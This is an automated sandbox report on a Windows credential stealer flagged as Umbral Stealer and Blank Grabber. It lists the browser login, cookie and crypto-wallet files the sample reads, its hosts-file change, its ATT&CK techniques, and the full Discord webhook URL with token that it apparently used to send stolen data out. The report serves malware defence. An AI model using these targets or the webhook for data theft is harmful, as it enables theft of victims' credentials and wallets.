Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: WE8zqotCFj.exe, type: SAMPLE
Source: Yara match	File source: 0.0.WE8zqotCFj.exe.23284ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WE8zqotCFj.exe PID: 7912, type: MEMORYSTR

Yara detected Umbral Stealer

Source: Yara match	File source: WE8zqotCFj.exe, type: SAMPLE
Source: Yara match	File source: 0.0.WE8zqotCFj.exe.23284ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WE8zqotCFj.exe PID: 7912, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WE8zqotCFj.exe PID: 7912, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: WE8zqotCFj.exe, type: SAMPLE
Source: Yara match	File source: 0.0.WE8zqotCFj.exe.23284ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WE8zqotCFj.exe PID: 7912, type: MEMORYSTR

Yara detected Umbral Stealer

Source: Yara match	File source: WE8zqotCFj.exe, type: SAMPLE
Source: Yara match	File source: 0.0.WE8zqotCFj.exe.23284ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WE8zqotCFj.exe PID: 7912, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	22 System Information Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	21 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	11 Remote System Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	11 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WE8zqotCFj.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.UmbralStealer
WE8zqotCFj.exe	83%	Virustotal		Browse
WE8zqotCFj.exe	100%	Avira	HEUR/AGEN.1307507
WE8zqotCFj.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
discord.com	162.159.137.232	true	false	high
ip-api.com	208.95.112.1	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp	false		high
http://ip-api.com/json/?fields=225545	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1437994638.000001A4E8066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A64A26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A648E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A56138000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E192C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205F0125000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205EFFEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000009.00000002.1502244276.0000021A56067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E1709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discord.com	WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287330000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discord.com/api/v10/users/	WE8zqotCFj.exe	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000014.00000002.1775683459.00000255A23B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.1416423096.000001A4D8218000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000014.00000002.1775683459.00000255A23B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discordapp.com/api/v9/users/	WE8zqotCFj.exe	false	high
https://contoso.com/Icon	powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com/json/?fiel0	WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://discord.com	WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287330000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000014.00000002.1775683459.00000255A23B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Blank-c/Umbral-Ste	WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Blank-c/Umbral-Stealer	WE8zqotCFj.exe	false	high
https://discord.com/api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwe	WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286A21000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287330000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1416423096.000001A4D8218000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1437994638.000001A4E8066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A64A26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A648E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A56138000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E192C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205F0125000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205EFFEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com	WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328724C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.orgX	powershell.exe, 00000009.00000002.1502244276.0000021A56067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E1709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1416423096.000001A4D7FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458314826.00000277A6C9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458314826.00000277A6C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A54871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205DFF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A0B71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1416423096.000001A4D7FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458314826.00000277A6CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A54871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205DFF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A0B71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.org	powershell.exe, 00000009.00000002.1502244276.0000021A56067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E1709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-	WE8zqotCFj.exe	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.137.232	discord.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574305
Start date and time:	2024-12-13 08:19:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WE8zqotCFj.exe renamed because original name is a hash value
Original Sample Name:	230f75b72d5021a921637929a63cfd79.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@37/22@2/2
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Successful, ratio: 67% Number of executed functions: 237 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, gstatic.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2188 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2820 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7696 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7708 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8128 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:20:29	API Interceptor	32x Sleep call for process: powershell.exe modified
02:21:01	API Interceptor	238x Sleep call for process: WE8zqotCFj.exe modified
02:21:02	API Interceptor	4x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	ip-api.com/json/?fields=225545
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	ip-api.com/json/
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	ip-api.com/json/
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
162.159.137.232	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse
	program.exe	Get hash	malicious	Blank Grabber	Browse
	NEVER OPEN!.exe	Get hash	malicious	Python Stealer, Empyrean, Discord Token Stealer	Browse
	YDW0S5K7hi.exe	Get hash	malicious	SilverRat	Browse
	Xyq6rvzLJs.exe	Get hash	malicious	SilverRat	Browse
	CFuejz2dRu.exe	Get hash	malicious	Discord Token Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.22561.28030.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse
	570ZenR882.exe	Get hash	malicious	Unknown	Browse
	Ff0ZjqSI9Y.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	162.159.128.233
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	162.159.128.233
	file.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	xooSsYaHN0.exe	Get hash	malicious	Go Stealer, Skuld Stealer	Browse	162.159.128.233
	IErMYVWrv9.exe	Get hash	malicious	Python Stealer, Luna Grabber, Luna Logger	Browse	162.159.135.232
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	162.159.138.232
ip-api.com	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	208.95.112.1
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	208.95.112.1
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
s-part-0035.t-0009.t-msedge.net	Ni2ghr9eUJ.exe	Get hash	malicious	Socks5Systemz	Browse	13.107.246.63
	wV1Mk5PUmi.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	Rbeu9JMfnq.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	13.107.246.63
	k2XnMjR4j0.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.63
	MN2MXYYRQG.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	D72j5I83wU.dll	Get hash	malicious	Amadey	Browse	13.107.246.63
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	ZS8xEqirxa.exe	Get hash	malicious	LummaC	Browse	104.21.27.188
	wV1Mk5PUmi.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	Rbeu9JMfnq.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.213.48
	fOhq9xghej.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	PO_11171111221.Vbs.vbs	Get hash	malicious	FormBook	Browse	162.159.129.233
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
TUT-ASUS	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	208.95.112.1
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.137.232
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	162.159.137.232
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	162.159.137.232
	creamkissingthingswithcreambananapackagecreamy.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	162.159.137.232
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	162.159.137.232
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	162.159.137.232
	ShareGate.24.12.1.msi	Get hash	malicious	Unknown	Browse	162.159.137.232
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	162.159.137.232
	c2.hta	Get hash	malicious	XWorm	Browse	162.159.137.232

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1965
Entropy (8bit):	5.377802142292312
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
MD5:	582A844EB067319F705A5ADF155DBEB0
SHA1:	68B791E0F77249BF83CD4B23A6C4A773365E2CAD
SHA-256:	E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
SHA-512:	6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
Malicious:	true
